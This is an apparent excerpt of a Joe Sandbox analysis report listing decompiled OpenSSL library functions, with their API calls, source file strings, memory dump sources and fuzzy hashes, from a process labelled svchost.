                                                                                                • Part of subcall function 00007FFBAB45A910: OPENSSL_LH_new.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A96A
                                                                                                • Part of subcall function 00007FFBAB45A910: OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A993
                                                                                                • Part of subcall function 00007FFBAB45A910: OPENSSL_LH_new.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9AF
                                                                                                • Part of subcall function 00007FFBAB45A910: OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9D8
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB4523E0), ref: 00007FFBAB45AD97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_newH_set_thunksO_zalloc$O_ctrl$D_priv_bytes_exE_newO_freeR_fetchR_freeX_new
                                                                                              • String ID: ssl\quic\quic_port.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_memdup
                                                                                              • String ID: ssl\ssl_lib.c
                                                                                              APIs
                                                                                              • OPENSSL_LH_retrieve.LIBCRYPTO-3-X64(?,00007FFBAB450198,00000000,00007FFBAB458275,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB4641E3
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB450198,00000000,00007FFBAB458275,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB464202
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,00007FFBAB450198,00000000,00007FFBAB458275,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB46428D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_insertH_retrieveO_zalloc
                                                                                              • String ID: ssl\quic\quic_stream_map.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_memdup
                                                                                              • String ID: ssl\ssl_lib.c
                                                                                              • API String ID: 3545228654-1984206432
                                                                                              • Opcode ID: 8ae493308588188c1086bbee4f7fc03183cd3bcc5c0eb1f562b8535bad2dc9fd
                                                                                              • Instruction ID: 8a23336690390fe20690e81ec46edbfe39484a68da36768e4fba82675af6d128
                                                                                              • Opcode Fuzzy Hash: 8ae493308588188c1086bbee4f7fc03183cd3bcc5c0eb1f562b8535bad2dc9fd
                                                                                              • Instruction Fuzzy Hash: A3212B65B1ABD181E752CB32D4813BC7B95EF84B84F489135DE5D87B69CF2CD4528700
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_free$O_malloc
                                                                                              • String ID: ssl\t1_lib.c
                                                                                              • API String ID: 2767441526-1168734446
                                                                                              • Opcode ID: d23f743535099a2c4ecc3846e82c0b1f0123525a9993317514069fe0cc3b4e20
                                                                                              • Instruction ID: fba1c6c68bed9e824ab7d8023e3c5e467d86e6b323cb28bf2a5eb17c26991578
                                                                                              • Opcode Fuzzy Hash: d23f743535099a2c4ecc3846e82c0b1f0123525a9993317514069fe0cc3b4e20
                                                                                              • Instruction Fuzzy Hash: 0521CF7370ABA181E752DB26D54026DA7A0EB45BC0F48D131EEAC43BAAEF3DE551C740
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_ctrl$O_zalloc
                                                                                              • String ID: ssl\quic\quic_demux.c
                                                                                              • API String ID: 870977572-194952269
                                                                                              • Opcode ID: 3d7659c4accdafd210d96943375ed6b1722b6f630bbf6f50d0c13c28fe6df9c0
                                                                                              • Instruction ID: 9cd2cddc070da9bab412468a195dd1d70b043e36bb7cc2d508d08870b39852c4
                                                                                              • Opcode Fuzzy Hash: 3d7659c4accdafd210d96943375ed6b1722b6f630bbf6f50d0c13c28fe6df9c0
                                                                                              • Instruction Fuzzy Hash: 3A116072609B92C6E761DB21E941A697BA4FB84BC4F498235EE5C43F75CF38E815CB00
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB41D131,?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB4828CB
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB41D131,?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB4828E1
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB41D131,?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB482908
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\statem\extensions_cust.c
                                                                                              • API String ID: 2581946324-1564674317
                                                                                              • Opcode ID: 7b54ba3a8a63aac01c81fb89d9ba8360a4a97c98200f84916bd5334e8dfc14e2
                                                                                              • Instruction ID: b27a816c079352dcee5a37ac60794c3a751046747ac848e8725167a5ca03f6fe
                                                                                              • Opcode Fuzzy Hash: 7b54ba3a8a63aac01c81fb89d9ba8360a4a97c98200f84916bd5334e8dfc14e2
                                                                                              • Instruction Fuzzy Hash: D51130B1A5AB9281EB519B65F88036D6360FB84B84F448136EFAD07B65DF7CD144C740
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_freeO_zalloc_beginthreadex
                                                                                              • String ID: crypto\thread\arch\thread_win.c
                                                                                              • API String ID: 1240409343-2915021490
                                                                                              • Opcode ID: 423ff864966eef510864d7505c4d9208903451e2d65eb1c1581e94dce3132e98
                                                                                              • Instruction ID: 9ec89fb2680603b966927cb0408295a889d1808ddea4d4ec7bb9772385230ce7
                                                                                              • Opcode Fuzzy Hash: 423ff864966eef510864d7505c4d9208903451e2d65eb1c1581e94dce3132e98
                                                                                              • Instruction Fuzzy Hash: 58019EB1B1A75282EB12CB25F8453A963B4FB48788F488136DE9C47BA5EF3CE554C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\quic\quic_txpim.c
                                                                                              • API String ID: 2581946324-1264249673
                                                                                              • Opcode ID: bfd892b1b6ed01ebceaa0872bc2514d2b7dd38eb631ac1bedfc8bde7a82d7930
                                                                                              • Instruction ID: 7e7024a19f728840d3134b576689814575e6a03fd6fe9a4e89c3ae0641632fc2
                                                                                              • Opcode Fuzzy Hash: bfd892b1b6ed01ebceaa0872bc2514d2b7dd38eb631ac1bedfc8bde7a82d7930
                                                                                              • Instruction Fuzzy Hash: 4B0171B2B1BB9281EF52DB21E8802B86764EB44BC0F48A035EF5D07B65DE3CD5458701
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB414CA1,?,?,?,00007FFBAB414A5D), ref: 00007FFBAB490AF5
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB414CA1,?,?,?,00007FFBAB414A5D), ref: 00007FFBAB490B0B
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB414CA1,?,?,?,00007FFBAB414A5D), ref: 00007FFBAB490B20
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\statem\statem_dtls.c
                                                                                              • API String ID: 2581946324-3166991913
                                                                                              • Opcode ID: a85e4b783e4a8bcea3a9faee574f95fad5154aeaaeb760acb57dd1e667d27870
                                                                                              • Instruction ID: bf3dbac929e0c267840542f26173918a5300b7a59ef2f8fbcd494a0c93df88cc
                                                                                              • Opcode Fuzzy Hash: a85e4b783e4a8bcea3a9faee574f95fad5154aeaaeb760acb57dd1e667d27870
                                                                                              • Instruction Fuzzy Hash: C5F030E1F5611395EE16DB79C8C26BC1711EF45B81F448435DE2D07762ED1ED609C701
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_free$Y_free
                                                                                              • String ID: ssl\ssl_lib.c
                                                                                              • API String ID: 3642664693-1984206432
                                                                                              • Opcode ID: 6d0946d844a4db522dc917eab90d6050f22cb33342ced9b0e25f45acba3a926a
                                                                                              • Instruction ID: 0f3cdb236f135d2c48a6115c9da95e88792015e20decd85b219aeec3c5967cd1
                                                                                              • Opcode Fuzzy Hash: 6d0946d844a4db522dc917eab90d6050f22cb33342ced9b0e25f45acba3a926a
                                                                                              • Instruction Fuzzy Hash: 9FE09AE1B4751290EE22EB72D8C22B823209F44B80F449031DD2C477B2CE1CE99AC302
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB4582F9
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: quic_conn_stream_new$ssl\quic\quic_impl.c
                                                                                              • API String ID: 2581946324-333456876
                                                                                              • Opcode ID: 185f3fa660f183b42e7f7ec6cb34732e5eddf49efa50fefa90d903e706a91fc1
                                                                                              • Instruction ID: 1f3ec326ff638d0a6f5deda5ed81bd30354c928935aa4760ab94c28eea53a510
                                                                                              • Opcode Fuzzy Hash: 185f3fa660f183b42e7f7ec6cb34732e5eddf49efa50fefa90d903e706a91fc1
                                                                                              • Instruction Fuzzy Hash: B151E7B1A1EE4652FA26D732E94067A6B90FF44B84F048235EF6D477A5DF3CE8118701
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,?,00000000,00007FFBAB420040), ref: 00007FFBAB420194
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,00000000,00007FFBAB420040), ref: 00007FFBAB42025B
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_freeO_zalloc
                                                                                              • String ID: ssl\ssl_ciph.c
                                                                                              • API String ID: 2237658545-1912280922
                                                                                              • Opcode ID: 81d8cf1528eb5d46c0f51a58f17a8be05794b480d16a1a5dcec022ef63581fdf
                                                                                              • Instruction ID: 934691cdfba5be66fd7ceb6cf63a8563afb8f3c5491c1932d31b6649b4ef272c
                                                                                              • Opcode Fuzzy Hash: 81d8cf1528eb5d46c0f51a58f17a8be05794b480d16a1a5dcec022ef63581fdf
                                                                                              • Instruction Fuzzy Hash: 31418DB2A0AB4182EA56CF65E5802797BA1FB45FC0F55C436DE2C47761EF39E980C341
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_freeO_malloc
                                                                                              • String ID: ssl\ssl_lib.c
                                                                                              • API String ID: 2609694610-1984206432
                                                                                              • Opcode ID: b92507850ed99600fc392696fa79ea4498c001a015ad090ddabc56f520770637
                                                                                              • Instruction ID: a4fb99237f9e8618d0a246362ab78b8801d8121d9ba63bfcedd5260006a5c2e6
                                                                                              • Opcode Fuzzy Hash: b92507850ed99600fc392696fa79ea4498c001a015ad090ddabc56f520770637
                                                                                              • Instruction Fuzzy Hash: B031CEB2B0BB5182FA92DF65D0942B833A0FB54B84F588436CE2D877A4DF39E4429311
                                                                                              Similarity
                                                                                              • API ID: O_freeO_memdup
                                                                                              • String ID: ssl\ssl_lib.c
                                                                                              • API String ID: 3962629258-1984206432
                                                                                              • Opcode ID: 38e1baf42bfe177be3940a0fd97c351b1f0ca28f8af4cfbb817061fe19b10ed1
                                                                                              • Instruction ID: 8e2240e40adeab930d3d81177e653ad6149f09b277f2bfcd77c0e12f534da38f
                                                                                              • Opcode Fuzzy Hash: 38e1baf42bfe177be3940a0fd97c351b1f0ca28f8af4cfbb817061fe19b10ed1
                                                                                              • Instruction Fuzzy Hash: 8F21F1A1F4B78380EE628A63E1443786599AF54BC4F08C435DEAC43BA5DD2DD5425300
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB412C9E
                                                                                                • Part of subcall function 00007FFBAB412860: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB41287D
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64 ref: 00007FFBAB412D3F
                                                                                                • Part of subcall function 00007FFBAB412860: InitializeCriticalSection.KERNEL32 ref: 00007FFBAB412893
                                                                                                • Part of subcall function 00007FFBAB412460: CRYPTO_malloc.LIBCRYPTO-3-X64 ref: 00007FFBAB41247F
                                                                                                • Part of subcall function 00007FFBAB412940: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB412964
                                                                                                • Part of subcall function 00007FFBAB412940: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBAB412990
                                                                                              Similarity
                                                                                              • API ID: O_zalloc$CriticalInitializeO_freeO_mallocSection_beginthreadex
                                                                                              • String ID: crypto\thread\arch.c
                                                                                              • API String ID: 4205757297-147645559
                                                                                              • Opcode ID: 1df285d3367c84bec90169404a8c602494a54b31cedb8312a4a4952bdaf28ccb
                                                                                              • Instruction ID: 968123061d8882feabf3f7c79e4d1e5c04664ceb159d325e3918443905709cad
                                                                                              • Opcode Fuzzy Hash: 1df285d3367c84bec90169404a8c602494a54b31cedb8312a4a4952bdaf28ccb
                                                                                              • Instruction Fuzzy Hash: B021BDA1E1BB4281EB56DF31E44206D22A4FF44B84F449436EE6D87BAAEF3CE500C710
                                                                                              APIs
                                                                                              • OPENSSL_LH_delete.LIBCRYPTO-3-X64(?,00007FFBAB458312,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB4648B4
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB458312,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB4648C9
                                                                                              Similarity
                                                                                              • API ID: H_deleteO_free
                                                                                              • String ID: ssl\quic\quic_stream_map.c
                                                                                              • API String ID: 2213166339-1155244460
                                                                                              • Opcode ID: 209cd0de2672983f8be90e1961f2fb088ae3ed1ac36a604aeebd1813528bc227
                                                                                              • Instruction ID: 992d5c386f52fb86c96d74de638c49db357e4a60c14cbff2955eb6882fc44616
                                                                                              • Opcode Fuzzy Hash: 209cd0de2672983f8be90e1961f2fb088ae3ed1ac36a604aeebd1813528bc227
                                                                                              • Instruction Fuzzy Hash: 1021E4B6A16F5481EB55CF3AE49012C73B8F748F98B148126EE5C47769DF38C8A2C380
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB460164
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB4601A3
                                                                                              Similarity
                                                                                              • API ID: O_freeO_zalloc
                                                                                              • String ID: ssl\quic\quic_rstream.c
                                                                                              • API String ID: 2237658545-3266392800
                                                                                              • Opcode ID: e761e806749da03bf56e2e36b210a9b0d9d62d323b370c1c01d566d46031b2fc
                                                                                              • Instruction ID: 6b9ccee34d3e911062b7d1b132941acc900906400c9337462bbb6df9a75a6538
                                                                                              • Opcode Fuzzy Hash: e761e806749da03bf56e2e36b210a9b0d9d62d323b370c1c01d566d46031b2fc
                                                                                              • Instruction Fuzzy Hash: 3411C272626B1285EA41DB29E8901AD77A4FB44B84F548439EE9C43766EF3CD552C700
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: crypto\thread\arch.c
                                                                                              • API String ID: 0-147645559
                                                                                              • Opcode ID: a0f20e0b3109180acf445ad273c8bb40febf88ff112b646f11ec94fc715c45f9
                                                                                              • Instruction ID: b6aa29e14faba1862e6d8eb3ba55dd685f7a5d53bedbe3b68e456ef268bf7da1
                                                                                              • Opcode Fuzzy Hash: a0f20e0b3109180acf445ad273c8bb40febf88ff112b646f11ec94fc715c45f9
                                                                                              • Instruction Fuzzy Hash: D70184E1F2A55282EF52EB72E4822B91354FF85B84F449032ED2D872A6DF1CD5928710
                                                                                              Similarity
                                                                                              • API ID: O_freeO_memdup
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h
                                                                                              • API String ID: 3962629258-3519961458
                                                                                              • Opcode ID: a728c59dc59ea8002b74f92822e2773b4a6ad8d6a9b46d238b29f504cf8f8bc1
                                                                                              • Instruction ID: f4a329ec23efb70ced967bb6b9b4adc3ac9f63a8405488b1e79d7098d81269dc
                                                                                              • Opcode Fuzzy Hash: a728c59dc59ea8002b74f92822e2773b4a6ad8d6a9b46d238b29f504cf8f8bc1
                                                                                              • Instruction Fuzzy Hash: 3C012CB2707B5281EB51DF22E8806596764FB98BC0F088435EE9C47B69DE3CD5618700
                                                                                              Similarity
                                                                                              • API ID: O_freeO_malloc
                                                                                              • String ID: ssl\record\rec_layer_d1.c
                                                                                              • API String ID: 2609694610-2186836241
                                                                                              • Opcode ID: 19350aefcc9e48473532e3a56b95fd137591b1c14b86f31f68a35ff9e07a6a0b
                                                                                              • Instruction ID: ce2f9ec12a5577cbfda81853401b9f79f78e6f432cb3dceb3e0801a0c3bec66b
                                                                                              • Opcode Fuzzy Hash: 19350aefcc9e48473532e3a56b95fd137591b1c14b86f31f68a35ff9e07a6a0b
                                                                                              • Instruction Fuzzy Hash: 490181B2B1B74292EA56DB25E4853AC7390FF44B44F88C435EF6C477A6EE78E4588700
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB447040: BIO_ctrl.LIBCRYPTO-3-X64(00000000,00007FFBAB446B57,00000000,00007FFBAB447D75,?,00000000,?,?,02000100,00007FFBAB44C1EB,02000100,00007FFBAB44E4DA,?,00007FFBAB450F14), ref: 00007FFBAB4470B3
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(00000000,00007FFBAB447D75,?,00000000,?,?,02000100,00007FFBAB44C1EB,02000100,00007FFBAB44E4DA,?,00007FFBAB450F14), ref: 00007FFBAB446B6A
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(00000000,00007FFBAB447D75,?,00000000,?,?,02000100,00007FFBAB44C1EB,02000100,00007FFBAB44E4DA,?,00007FFBAB450F14), ref: 00007FFBAB446B93
                                                                                              Similarity
                                                                                              • API ID: O_free$O_ctrl
                                                                                              • String ID: ssl\quic\json_enc.c
                                                                                              • API String ID: 1134426049-3790216822
                                                                                              • Opcode ID: e9ede09c86302a8fa937d5da6f7ae62213afd64565b9edc0a6eb65effc076c5c
                                                                                              • Instruction ID: 058a7db2fd8356063e0f6e13d30a839b6ed7d60a84f0b165cd59fc53228fa393
                                                                                              • Opcode Fuzzy Hash: e9ede09c86302a8fa937d5da6f7ae62213afd64565b9edc0a6eb65effc076c5c
                                                                                              • Instruction Fuzzy Hash: 2601ADB2A1666182EB51CF31E89016C7368EB80B84F449532EE5C47B6ACE3CD992C740
                                                                                              APIs
                                                                                              • CRYPTO_clear_free.LIBCRYPTO-3-X64(?,00007FFBAB4609B9,?,?,00000000,00007FFBAB460191,?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000), ref: 00007FFBAB460798
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB4609B9,?,?,00000000,00007FFBAB460191,?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000), ref: 00007FFBAB4607B9
                                                                                              Similarity
                                                                                              • API ID: O_clear_freeO_free
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/ring_buf.h
                                                                                              • API String ID: 589068787-3109175187
                                                                                              • Opcode ID: 88fc3910a59db1d4f0bbec0069283dcebb86222718afef598986d2a39b1b1346
                                                                                              • Instruction ID: 637861863fb8f9430ebefdc58bf66cffe45c8fa535d418739adc90e0c66f0e19
                                                                                              • Opcode Fuzzy Hash: 88fc3910a59db1d4f0bbec0069283dcebb86222718afef598986d2a39b1b1346
                                                                                              • Instruction Fuzzy Hash: 39F082B2A56A0285E7529F79E88126C33E5EB44B44F48C034CA1C87365EE3CD595C340
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeO_zallocSection
                                                                                              • String ID: crypto\thread\arch\thread_win.c
                                                                                              • API String ID: 3172406216-2915021490
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalDeleteO_freeSection
                                                                                              • String ID: crypto\thread\arch\thread_win.c
                                                                                              • API String ID: 3175850418-2915021490
                                                                                              APIs
                                                                                              • GetSystemTimeAdjustment.KERNEL32 ref: 64946F72
                                                                                              • _errno.MSVCRT ref: 64946F95
                                                                                              • QueryPerformanceFrequency.KERNEL32 ref: 64946FB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustmentFrequencyPerformanceQuerySystemTime_errno
                                                                                              • String ID:
                                                                                              • API String ID: 931094001-0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\quic\quic_txp.c
                                                                                              • API String ID: 3931833713-3700743932
                                                                                              APIs
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(?,00000031,?,00007FFBAB45CC96,00000000,?,00000000,?,?,00000000,00000000,00007FFBAB45C5FE,?,?,00000000), ref: 00007FFBAB45D0AB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\quic\quic_record_rx.c
                                                                                              • API String ID: 3931833713-3047069087
                                                                                              APIs
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(?,00000000,?,00007FFBAB466088,?,00007FFBAB44F4D2,?,00007FFBAB450F40), ref: 00007FFBAB482A51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\statem\extensions_cust.c
                                                                                              • API String ID: 3931833713-1564674317
                                                                                              APIs
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(?,00000000,?,00007FFBAB431EBC,?,?,?,00007FFBAB4310C3,00000004,00007FFBAB4314E5), ref: 00007FFBAB481D61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
